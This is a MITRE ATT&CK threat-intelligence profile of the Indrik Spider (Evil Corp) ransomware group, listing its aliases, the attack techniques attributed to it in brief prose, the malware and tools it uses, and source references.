Skip to content

G0119 Indrik Spider

Indrik Spider is a Russia-based cybercriminal group that has been active since at least 2014. Indrik Spider initially started with the Dridex banking Trojan, and then by 2017 they began running ransomware operations using BitPaymer, WastedLocker, and Hades ransomware. Following U.S. sanctions and an indictment in 2019, Indrik Spider changed their tactics and diversified their toolset.145

Item Value
ID G0119
Associated Names Evil Corp, Manatee Tempest, DEV-0243, UNC2165
Version 4.1
Created 06 January 2021
Last Modified 28 October 2024
Navigation Layer View In ATT&CK® Navigator

Associated Group Descriptions

Name Description
Evil Corp 45
Manatee Tempest 3
DEV-0243 3
UNC2165 2

Techniques Used

Domain ID Name Use
enterprise T1583 Acquire Infrastructure Indrik Spider has purchased access to victim VPNs to facilitate access to victim environments.2
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell Indrik Spider has used PowerShell Empire for execution of malware.16
enterprise T1059.003 Windows Command Shell Indrik Spider has used batch scripts on victim’s machines.12
enterprise T1059.007 JavaScript Indrik Spider has used malicious JavaScript files for several components of their attack.6
enterprise T1584 Compromise Infrastructure -
enterprise T1584.004 Server Indrik Spider has served fake updates via legitimate websites that have been compromised.1
enterprise T1136 Create Account Indrik Spider used wmic.exe to add a new user to the system.6
enterprise T1136.001 Local Account Indrik Spider has created local system accounts and has added the accounts to privileged groups.2
enterprise T1555 Credentials from Password Stores -
enterprise T1555.005 Password Managers Indrik Spider has accessed and exported passwords from password managers.2
enterprise T1486 Data Encrypted for Impact Indrik Spider has encrypted domain-controlled systems using BitPaymer.1 Additionally, Indrik Spider used PsExec to execute a ransomware script.2
enterprise T1074 Data Staged -
enterprise T1074.001 Local Data Staging Indrik Spider has stored collected data in a .tmp file.6
enterprise T1587 Develop Capabilities -
enterprise T1587.001 Malware Indrik Spider has developed malware for their operations, including ransomware such as BitPaymer and WastedLocker.1
enterprise T1484 Domain or Tenant Policy Modification -
enterprise T1484.001 Group Policy Modification Indrik Spider has used Group Policy Objects to deploy batch scripts.12
enterprise T1585 Establish Accounts -
enterprise T1585.002 Email Accounts Indrik Spider has created email accounts to communicate with their ransomware victims, to include providing payment and decryption details.1
enterprise T1567 Exfiltration Over Web Service -
enterprise T1567.002 Exfiltration to Cloud Storage Indrik Spider has exfiltrated data using Rclone or MEGASync prior to deploying ransomware.2
enterprise T1590 Gather Victim Network Information Indrik Spider has downloaded tools, such as the Advanced Port Scanner utility and Lansweeper, to conduct internal reconnaissance of the victim network. Indrik Spider has also accessed the victim’s VMware VCenter, which had information about host configuration, clusters, etc.2
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools Indrik Spider used PsExec to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring.6 Indrik Spider has used MpCmdRun to revert the definitions in Microsoft Defender.2 Additionally, Indrik Spider has used WMI to stop or uninstall and reset anti-virus products and other defensive services.2
enterprise T1070 Indicator Removal -
enterprise T1070.001 Clear Windows Event Logs Indrik Spider has used Cobalt Strike to empty log files.6 Additionally, Indrik Spider has cleared all event logs using wevutil.2
enterprise T1105 Ingress Tool Transfer Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host.162
enterprise T1036 Masquerading -
enterprise T1036.005 Match Legitimate Resource Name or Location Indrik Spider used fake updates for FlashPlayer plugin and Google Chrome as initial infection vectors.1
enterprise T1112 Modify Registry Indrik Spider has modified registry keys to prepare for ransomware execution and to disable common administrative utilities.2
enterprise T1003 OS Credential Dumping -
enterprise T1003.001 LSASS Memory Indrik Spider used Cobalt Strike to carry out credential dumping using ProcDump.6
enterprise T1012 Query Registry Indrik Spider has used a service account to extract copies of the Security Registry hive.2
enterprise T1021 Remote Services -
enterprise T1021.001 Remote Desktop Protocol Indrik Spider has used RDP for lateral movement.2
enterprise T1021.004 SSH Indrik Spider has used SSH for lateral movement.2
enterprise T1018 Remote System Discovery Indrik Spider has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database.6
enterprise T1489 Service Stop Indrik Spider has used PsExec to stop services prior to the execution of ransomware.6
enterprise T1558 Steal or Forge Kerberos Tickets -
enterprise T1558.003 Kerberoasting Indrik Spider has conducted Kerberoasting attacks using a module from GitHub.2
enterprise T1007 System Service Discovery Indrik Spider has used the win32_service WMI class to retrieve a list of services from the system.6
enterprise T1552 Unsecured Credentials -
enterprise T1552.001 Credentials In Files Indrik Spider has searched files to obtain and exfiltrate credentials.2
enterprise T1204 User Execution -
enterprise T1204.002 Malicious File Indrik Spider has attempted to get users to click on a malicious zipped file.6
enterprise T1078 Valid Accounts Indrik Spider has used valid accounts for initial access and lateral movement.2 Indrik Spider has also maintained access to the victim environment through the VPN infrastructure.2
enterprise T1078.002 Domain Accounts Indrik Spider has collected credentials from infected systems, including domain accounts.1
enterprise T1047 Windows Management Instrumentation Indrik Spider has used WMIC to execute commands on remote computers.6

Software

ID Name References Techniques
S0570 BitPaymer 14 Bypass User Account Control:Abuse Elevation Control Mechanism Token Impersonation/Theft:Access Token Manipulation Local Account:Account Discovery Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Service:Create or Modify System Process Data Encrypted for Impact Execution Guardrails Windows File and Directory Permissions Modification:File and Directory Permissions Modification NTFS File Attributes:Hide Artifacts Timestomp:Indicator Removal Inhibit System Recovery Modify Registry Native API Network Share Discovery Encrypted/Encoded File:Obfuscated Files or Information Query Registry Remote System Discovery System Service Discovery
S0154 Cobalt Strike 482 Sudo and Sudo Caching:Abuse Elevation Control Mechanism Bypass User Account Control:Abuse Elevation Control Mechanism Parent PID Spoofing:Access Token Manipulation Token Impersonation/Theft:Access Token Manipulation Make and Impersonate Token:Access Token Manipulation Domain Account:Account Discovery DNS:Application Layer Protocol Web Protocols:Application Layer Protocol File Transfer Protocols:Application Layer Protocol BITS Jobs Browser Session Hijacking JavaScript:Command and Scripting Interpreter Visual Basic:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Python:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Standard Encoding:Data Encoding Data from Local System Protocol or Service Impersonation:Data Obfuscation Data Transfer Size Limits Deobfuscate/Decode Files or Information Asymmetric Cryptography:Encrypted Channel Symmetric Cryptography:Encrypted Channel Exploitation for Client Execution Exploitation for Privilege Escalation File and Directory Discovery Process Argument Spoofing:Hide Artifacts Disable or Modify Tools:Impair Defenses Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Network Service Discovery Network Share Discovery Non-Application Layer Protocol Indicator Removal from Tools:Obfuscated Files or Information Obfuscated Files or Information Office Template Macros:Office Application Startup LSASS Memory:OS Credential Dumping Security Account Manager:OS Credential Dumping Domain Groups:Permission Groups Discovery Local Groups:Permission Groups Discovery Process Discovery Dynamic-link Library Injection:Process Injection Process Hollowing:Process Injection Process Injection Protocol Tunneling Domain Fronting:Proxy Internal Proxy:Proxy Query Registry Reflective Code Loading Remote Desktop Protocol:Remote Services SSH:Remote Services Windows Remote Management:Remote Services SMB/Windows Admin Shares:Remote Services Distributed Component Object Model:Remote Services Remote System Discovery Scheduled Transfer Screen Capture Software Discovery Code Signing:Subvert Trust Controls Rundll32:System Binary Proxy Execution System Network Configuration Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services Pass the Hash:Use Alternate Authentication Material Domain Accounts:Valid Accounts Local Accounts:Valid Accounts Windows Management Instrumentation
S0695 Donut 7 Web Protocols:Application Layer Protocol Python:Command and Scripting Interpreter Command and Scripting Interpreter Visual Basic:Command and Scripting Interpreter JavaScript:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Disable or Modify Tools:Impair Defenses Indicator Removal Ingress Tool Transfer Native API Encrypted/Encoded File:Obfuscated Files or Information Software Packing:Obfuscated Files or Information Compression:Obfuscated Files or Information Process Discovery Process Injection Reflective Code Loading
S0384 Dridex 145 Web Protocols:Application Layer Protocol Browser Session Hijacking Symmetric Cryptography:Encrypted Channel Asymmetric Cryptography:Encrypted Channel DLL:Hijack Execution Flow Native API Obfuscated Files or Information Proxy Multi-hop Proxy:Proxy Remote Access Tools Scheduled Task:Scheduled Task/Job Software Discovery Regsvr32:System Binary Proxy Execution System Information Discovery Malicious File:User Execution
S0363 Empire 1 Bypass User Account Control:Abuse Elevation Control Mechanism SID-History Injection:Access Token Manipulation Access Token Manipulation Create Process with Token:Access Token Manipulation Domain Account:Account Discovery Local Account:Account Discovery LLMNR/NBT-NS Poisoning and SMB Relay:Adversary-in-the-Middle Web Protocols:Application Layer Protocol Archive Collected Data Automated Collection Automated Exfiltration Security Support Provider:Boot or Logon Autostart Execution Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Shortcut Modification:Boot or Logon Autostart Execution Browser Information Discovery Clipboard Data PowerShell:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Command and Scripting Interpreter Local Account:Create Account Domain Account:Create Account Windows Service:Create or Modify System Process Keychain:Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores Group Policy Modification:Domain or Tenant Policy Modification Domain Trust Discovery Local Email Collection:Email Collection Asymmetric Cryptography:Encrypted Channel Accessibility Features:Event Triggered Execution Exfiltration Over C2 Channel Exfiltration to Code Repository:Exfiltration Over Web Service Exfiltration to Cloud Storage:Exfiltration Over Web Service Exploitation for Privilege Escalation Exploitation of Remote Services File and Directory Discovery Group Policy Discovery Path Interception by Unquoted Path:Hijack Execution Flow Path Interception by Search Order Hijacking:Hijack Execution Flow Path Interception by PATH Environment Variable:Hijack Execution Flow Dylib Hijacking:Hijack Execution Flow DLL:Hijack Execution Flow Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Credential API Hooking:Input Capture Native API Network Service Discovery Network Share Discovery Network Sniffing Command Obfuscation:Obfuscated Files or Information LSASS Memory:OS Credential Dumping Process Discovery Process Injection Distributed Component Object Model:Remote Services SSH:Remote Services Scheduled Task:Scheduled Task/Job Screen Capture Security Software Discovery:Software Discovery Kerberoasting:Steal or Forge Kerberos Tickets Golden Ticket:Steal or Forge Kerberos Tickets Silver Ticket:Steal or Forge Kerberos Tickets System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery Service Execution:System Services MSBuild:Trusted Developer Utilities Proxy Execution Credentials In Files:Unsecured Credentials Private Keys:Unsecured Credentials Pass the Hash:Use Alternate Authentication Material Video Capture Bidirectional Communication:Web Service Windows Management Instrumentation
S0002 Mimikatz 12 SID-History Injection:Access Token Manipulation Account Manipulation Security Support Provider:Boot or Logon Autostart Execution Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores Windows Credential Manager:Credentials from Password Stores DCSync:OS Credential Dumping Security Account Manager:OS Credential Dumping LSASS Memory:OS Credential Dumping LSA Secrets:OS Credential Dumping Rogue Domain Controller Steal or Forge Authentication Certificates Golden Ticket:Steal or Forge Kerberos Tickets Silver Ticket:Steal or Forge Kerberos Tickets Private Keys:Unsecured Credentials Pass the Hash:Use Alternate Authentication Material Pass the Ticket:Use Alternate Authentication Material
S0029 PsExec 6 Domain Account:Create Account Windows Service:Create or Modify System Process Lateral Tool Transfer SMB/Windows Admin Shares:Remote Services Service Execution:System Services
S0612 WastedLocker 7489 Bypass User Account Control:Abuse Elevation Control Mechanism Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Data Encrypted for Impact Deobfuscate/Decode Files or Information File and Directory Discovery Windows File and Directory Permissions Modification:File and Directory Permissions Modification Hidden Files and Directories:Hide Artifacts NTFS File Attributes:Hide Artifacts DLL:Hijack Execution Flow Inhibit System Recovery Modify Registry Native API Network Share Discovery Junk Code Insertion:Obfuscated Files or Information Encrypted/Encoded File:Obfuscated Files or Information Peripheral Device Discovery Query Registry Service Execution:System Services System Checks:Virtualization/Sandbox Evasion

References

  1. Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021. 

  2. Mandiant Intelligence. (2022, June 2). To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions. Retrieved July 29, 2024. 

  3. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023. 

  4. Podlosky, A., Feeley, B. (2021, March 17). INDRIK SPIDER Supersedes WastedLocker with Hades Ransomware to Circumvent OFAC Sanctions. Retrieved September 15, 2021. 

  5. U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021. 

  6. Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021. 

  7. Antenucci, S., Pantazopoulos, N., Sandee, M. (2020, June 23). WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group. Retrieved September 14, 2021. 

  8. Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023. 

  9. Milenkoski, A. (2022, November 7). SocGholish Diversifies and Expands Its Malware Staging Infrastructure to Counter Defenders. Retrieved March 22, 2024.